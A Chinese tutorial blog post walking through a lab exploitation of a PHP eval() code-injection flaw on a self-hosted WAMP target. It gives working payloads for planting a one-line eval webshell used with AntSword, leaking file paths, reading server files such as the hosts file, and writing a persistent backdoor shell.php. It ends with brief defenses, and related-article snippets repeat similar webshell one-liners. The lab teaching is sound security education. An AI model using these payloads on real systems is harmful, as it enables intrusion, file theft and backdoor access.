【PHP注入02】PHP注入漏洞利用实验

已于 2022-07-01 04:45:22 修改
阅读量3.6k 收藏 12
点赞数 3
分类专栏: # 筑基07:WEB漏洞原理 文章标签: php 安全 web安全
于 2022-02-27 02:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123157119
版权

目录

1 实验简介

1.1 实验目的

  1. 了解PHP漏洞的危害;
  2. 掌握PHP漏洞的利用方法。

1.2 实验环境

  1. 靶机:win2008虚拟机,部署WAMP环境,虚拟机系统安装及WAMP部署方法参考文章《win2008R2SP1+WAMP环境部署》。在网站根目录下创建phptest.php文件,该文件代码存在eval()函数漏洞,详细代码参考文章《PHP语言常见可注入函数》。
  2. 真实机:win10系统,安装中国蚁剑软件。

2 实验内容

2.1 实验一:直接获取shell

  1. 当访问存在eval函数漏洞的网址时,提交参数为?code=@eval($_POST[1]);,即可构成一句话木马,密码为1,建议配合中国蚁剑使用。
  2. 运行中国蚁剑,在界面空白处点击右键,点击添加数据。
    在这里插入图片描述
  3. 填写参数如下,其中URL中要注意语句结尾应有分号。填写后点击提交。
    在这里插入图片描述
  4. 提交后可以看到页面多了一条内容,双击可以看到靶机的相关信息。
    在这里插入图片描述

2.2 实验二:获取当前文件的绝对路径。

当访问存在eval函数漏洞的网址时,提交参数为?code=print(__FILE__);即可获取当前网页的绝对路径,其他漏洞依次类推。
在这里插入图片描述

2.3 实验三:读文件

  1. 前提:(1)目标文件路径;(2)读取权限。
  2. 方法:利用file_get_contents()函数读取服务器文件。
  3. 例子:要读取服务器的hosts文件,传入参数?code=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts'));,即可将目标文件内容显示在页面上。
    在这里插入图片描述

2.4 实验四:写文件

  1. 前提:具备文件夹的写入权限。
  2. 方法:利用file_put_contents()函数写入服务器文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
  3. 例子:传入参数?code=file_put_contents($_POST[1],$_POST[2]);,同时利用BurpSuite工具截取请求,修改请求为POST类型并在右侧添加POST参数内容,参数1值为shell.php,参数2值为<?php eval($_POST['ant']); ?>,表示在当前目录下创建文件shell.php,并写入一个后门。
    在这里插入图片描述
  4. 点击send后,在服务器目录下,可以看到生成了shell.php文件。
  5. 使用蚁剑访问刚刚写入的后门文件,按以下填写参数,并点击添加。
    在这里插入图片描述
  6. 双击新添加的数据,即可管理靶机。
    在这里插入图片描述

3 防御

  1. 尽量不要使用eval()等函数,如需使用则一定要进行严格的过滤;
  2. preg_replace放弃使用/e修饰符;
  3. 在php.ini文件中,将assert等函数禁用掉,如disable_functions = assert

4 总结

  1. 获取网站相关的信息利用PHP漏洞;获取数据库相关内容利用SQL注入漏洞。
  2. 掌握漏洞验证及利用的过程。
  3. 掌握利用漏洞读写文件及建立后门的过程。
Fighting_hawk
关注
专栏目录
php168sql注入漏洞
08-15
### PHP168 SQL注入漏洞分析与利用 #### 背景介绍 PHP168是一款基于PHP语言开发的内容管理系统,被广泛应用于政府网站、企业官网等场景中。然而,在某些版本中,PHP168存在着严重的SQL注入漏洞,攻击者可以利用此...
PHP漏洞全解(二)-命令注入攻击
老鹰之歌的学习笔记
09-21 2326
本文主要介绍针对PHP网站常见的攻击方式中的命令攻击。Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态生成的内容。使用系统命令是一项危险的操作,尤其在你试图使用远程数据来构造要执行的命令时更是如此。如果使用了被污染数据,命令注入漏洞就产生了。 命令注入攻击
PHP代码函数的执行漏洞
知足且坚定,温柔且上进
04-07 1877
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
PHP常见的攻击方式及其应对策略
最新发布
2401_86114846的博客
07-19 501
为了保障网站和应用的安全,我们需要了解这些攻击方式的特点和原理,并采取相应的应对策略进行防范。通过加强安全意识和采取有效的安全措施,我们可以降低PHP应用的安全风险,保护用户数据的安全和隐私。攻击者通过在输入字段中插入恶意的SQL代码,使得原本正常的SQL查询语句被改变,从而获取数据库中的敏感信息或者对数据库进行非法操作。攻击者通过在Web页面中插入恶意脚本,当用户浏览该页面时,恶意脚本会被执行,从而窃取用户信息或者对用户进行其他恶意操作。等),将恶意文件或代码包含到目标文件中,从而执行恶意操作。
php函数漏洞总结
qq_37410729的博客
07-31 1410
php一些漏洞函数
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7337
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
php漏洞eval,Web安全之代码执行漏洞
weixin_36440677的博客
03-11 1858
原标题:Web安全之代码执行漏洞内容1、代码执行漏洞的概述2、代码执行漏洞的危害3、代码执行漏洞的利用4、代码执行漏洞的防御 背景介绍在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。例子PHP CMS中 settings的内容:array('upl...
PHP危险函数及漏洞复现
Feng_Blue_的博客
09-29 794
危险函数 eval 语句: eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如: 但这里我们用Feng来进行中国菜刀连接。 连接成功之后如下 能直接对对方服务器进行任何控制, assert() assert()同样会将字符串当做PHP 代码来执行。 在网页中通过hackbar来操作,是可以执行系统命令,如下图 preg_replace() 这个函数的作用是对字符串进行正则匹配后替换,列如下图: preg_rep...
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
本文将分析Discuz7.2版中faq.php页面存在的SQL注入漏洞,以便开发者了解如何防范此类攻击。 首先,要了解SQL注入漏洞的形成条件,通常是由于Web应用对用户输入的数据处理不当导致的。在本例中,漏洞出现在处理gids...
PHP序列化/对象注入漏洞分析
10-22
描述中的例子展示了如何利用PHP对象注入漏洞。在这个例子中,`unserialize()`函数被用来处理来自用户请求的`$_REQUEST['r']`参数。攻击者可以通过提供特制的序列化数据来控制`$var1`变量,进而执行任意代码。代码...
php is_numberic函数造成的SQL注入漏洞
09-04
然而,如标题和描述所指出的,不当使用`is_numeric`可能会导致SQL注入漏洞,这是一种严重的安全问题。 一、`is_numeric`函数详解 `is_numeric`函数不仅会识别整数和浮点数,还会接受以数字开头的字符串,比如"123...
php eval 黑客利用,代码安全审计:当file_exists遇上eval
weixin_28323057的博客
03-28 346
‍起因‍昨晚有人在一QQ群上问lcms(一款网站CMS系统)的一个漏洞是怎么形成的,说了半天。他截图不完整,于是叫他传代码,下载回来找到router.php代码片段如下:protectedfunctiongetInputString($name,$default_value="",$format="GPCS"){//orderofretrievedefaultGPCS(g...
php eval 黑客利用,eval一句话木马详细讲解
weixin_29184075的博客
03-28 2450
来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部...
eval代码执行漏洞
ChenZIDu的博客
09-22 5852
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 看一则样例 <?php include "flag.php"; $a = @$_REQUEST['hello']; eva...
PHP代码注入PHP代码注入漏洞
cc
03-06 6219
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1801
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本中,我们可以对输入进行注入攻击。什么是注入注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
Web攻防系列教程之浅析PHP命令注入攻击
cangyingaoyou的专栏
02-13 2597
PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入攻击漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入攻击漏洞给出了可行的方法和建议。 Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致
php中eval和system的细节使用(配合文件上传漏洞)
Yuppie001的博客
12-19 1621
1.eval():函数用于执行作为字符串提供的 PHP 代码。这意味着它将一个 PHP 代码字符串作为参数,并执行它,就像它是常规的 PHP 代码一样。2.system(): 函数用于在 PHP 脚本中执行外部程序或者 shell 命令。它将命令传递给命令行并输出结果。
PHP168 SQL注入漏洞分析与利用
"php168sql注入漏洞描述了一个特定版本的php168存在SQL注入安全问题,允许攻击者通过这个漏洞获取数据库的相关信息。这个问题通常发生在应用未能正确过滤或验证用户输入的情况下,使得恶意用户可以构造特殊的SQL查询...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值